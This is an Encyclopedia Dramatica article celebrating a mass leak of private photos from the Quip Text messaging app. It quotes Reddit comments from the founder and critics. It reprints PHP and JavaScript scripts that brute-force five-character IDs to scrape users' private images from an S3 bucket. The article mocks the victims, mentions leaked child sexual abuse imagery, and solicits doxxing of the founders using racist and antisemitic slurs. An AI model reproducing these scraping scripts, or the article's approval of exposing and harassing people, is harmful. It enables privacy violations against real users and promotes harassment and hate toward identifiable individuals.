Quiptxt Day

From Encyclopedia Dramatica
Jump to: navigation, search


Quip Text was a $0.99 iPhone application used by Applefags for cheaply sending pics, mainly of their small and poorly circumcised penises and sloppy meat-curtain vaginas to friends and family. The EPICNESS that is Quiptext Day is the result of Palpacino and, several months later, Anonymous realizing that the protocol for sending these pics was secured by only a five digit alphanumeric code; randomize this code using some simple PHP programing, and the millions of pics that these massive retards had sent came spilling out, swamping /b/ with the biggest tsunami of chemo-OC ever. Within hours, the Quip Text website was shutdown and taken offline, but not before the supposedly private photos of millions of iPhone users were shared with the world. Thus, massive fail became epic win. In addition to the standard pictures of cocks and tits and vaginas, there are pictures of CP, what looks to be possibly photos taken by a serial killer of dead chicks with plastic bags over their heads on hotel room floors, gore, self-penetration with massive objects, and every other random awesomeness that perfectly normal everyday people do when they think no one will find out.

Originally when this was discovered the URLs on the quiptext site contained names, as well as original messages sent. It was later changed to just photos. This is how most Facebook accounts were linked to the photos.

As one Anon put it:

  • Saturday: No one knows about your company.
  • Sunday: Anon finds your company and everyone knows about your company.
  • Monday: You have no company.


Ish comments on Reddit[edit]

Original comment from Ish[edit]

   
 
Hello, this is Ish, the founder of Addy Mobile, makers of the Quip app.

As soon as this post came to our attention, we immediately shut down our servers. We have also now disabled all S3 access and have started to systematically secure all files in the system. We will not bring the system back up until we have adequate security around all files shared over Quip. I apologize to our users for this security breach and promise we will do everything in our power to make sure none of their information is exposed once we bring the service back up. The vision for Quip has always been to provide users a quick, simple, and affordable way for iPhone users to send picture messages without paying exorbitant carrier fees. We are a small company (3 people) but we will work as quickly as possible to bring back the service up in a safe and secure manner. -Ish
 


 
 

Ish

What Ish Really Meant[edit]

   
 
Hello, this is Ish, the founder of Addy Mobile, makers of the Quip app.

So we made this dumb shit so you cheap bastards could send pictures and shit, but all we really wanted was teh monies, so instead of funding security we shifted the budget to she-male prostitutes, inter-species erotica, and blow. Shit was so ca$h. We're sorry ladies, but your vaginas are now all over the interwebs. Oh, and guys, your cawks aren't safe either. These pictures of your indecent and morally bankrupt behavior probably won't come back to harm you. The worst that is likely to happen is some creepy perv is jerkin it to your underage photos and decides to stalk you. Here's hoping your genitals don't get turned into a wind chime or a lampshade.

So, well, shit. Fuck me.

-Ish
 


 
 

Some replies to said comment[edit]

   
 

A breach in security? A breach would imply that there was some flaw in your security. What you had was a complete lack of security. Putting the photos on a hosted server? I refuse to believe anyone is that incompetent. You were just lazy with people's private data, and got called out on it.
 


 
 

rampantdissonance

   
 
palpacino discovered this flaw a year ago, and posted about it on both digg and 4chan.

Many people have known how to access and download gigabytes of private information off your site, and you only resorted to IP banning one such user. This is much more than a security breach... not using appropriate encryption when handling private information is just extremely irresponsible. A 5 character hash?! REALLY?
 


 
 

rolmos

   
 
No. Excuse.

I'm a web developer also, and there's just no excuse for this - this isn't an oversight, a mistake, or unforeseen happenstance... this is willful and negligent incompetence, if not worse. You don't need a CS degree to know this. You don't need years of experience in the industry for this - I know 8 year-olds who can call this problem out into the open as soon as they saw it. For the sake of the rest of us in this industry, maybe you should leave it. If what I'm reading below is true (that this has been known and in the wild for over a year), then you guys really need to burn for this. That's the line between just being wildly incompetent, and maliciously disregarding your users' privacy. I hope your service never comes back up - there are a bajillion people in the world who can implement while demonstrating one iota of competence.
 


 
 

potatolicious

[-+]Quiptxt Scripts[edit]

Original PHP Script

<html>
<head>
	<title>search</title>
	<script language="JavaScript">
	function notFound(image) {
		image.style.display = "none";
	}
	</script>
</head>
<body>
<?php
for ($i=0; $i<2000; $i++) {
	$link = genLink();

	echo "<a href='http://pic.quiptxt.com/".$link."' target='_blank'><img alt='' width='100' height='100' border='0'src='http://quipimg.s3.amazonaws.com/".$link.".jpg' onerror='notFound(this);'></a> ";
}

function genLink() {
	// characters to use
	$chars = array_merge(range('a','z'),range('0','9'));

	// shuffle array
	shuffle($chars);

	// return characters
	return substr(implode('',$chars),0,5);
}
?>
</body>
</html>

Later Revised PHP Code

<?php
$c="abcdefghijklmnopqrstuvwxyz0123456789";while(++$y){echo"<img
src=http://quipimg.s3.amazonaws.com/";for($z=1;$z<=5;$z++)echo$c[mt_rand(0,35)];
echo".jpg onerror=\"this.style.display='none'\">";if($y>=1000)break;}
?>

Java Script code

<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Quip</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
</head>

<body>
<img id="quip" width=1 height=1 style="display: none" src="quip.jpg" onerror="randquip()" onload="found();" />
<div id="info"></div>
<div id="save"></div>

<script type="text/javascript">
function found() {
$("#save").prepend("<a target='_new' href='http://pic.quiptxt.com/"+id+"'><img src='http://quipimg.s3.amazonaws.com/" + id + ".jpg' title='"+id+"' /></a> ");
randquip();
}
function randquip() {
var letters = new Array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0" );
var r1 = Math.floor(Math.random() * letters.length);
var r2 = Math.floor(Math.random() * letters.length);
var r3 = Math.floor(Math.random() * letters.length);
var r4 = Math.floor(Math.random() * letters.length);
var r5 = Math.floor(Math.random() * letters.length);

id = letters[r1] + letters[r2] + letters[r3] + letters[r4]+ letters[r5];
$("#quip").attr("src", "http://quipimg.s3.amazonaws.com/" + id + ".jpg");
$("#info").html("<b>" + id + "</b>");
}
// randquip();
// setInterval(randquip, 5000);
</script>

</body>
</html>


Facebook Victims[edit]

Facebook Gallery About missing Pics
[Collapse GalleryExpand Gallery]


The Greedy Retards who created Quiptxt[edit]

Cowbell small.jpg This section needs moar dox.
You can help by adding moar dox.


To the surprise of no-one the stunning greed and programming incompetence of Quiptxt were the result of a Jew and a Chutney Fucker. Should have let an American do it, lol. We hope they get v& for hosting all the jailbait and be forced to spend their remaining days in a cell with Bubba who will make their assholes bleed for great justice.

Ish Harshawat[edit]

Blake EngelJew[edit]


See Also[edit]

External Links[edit]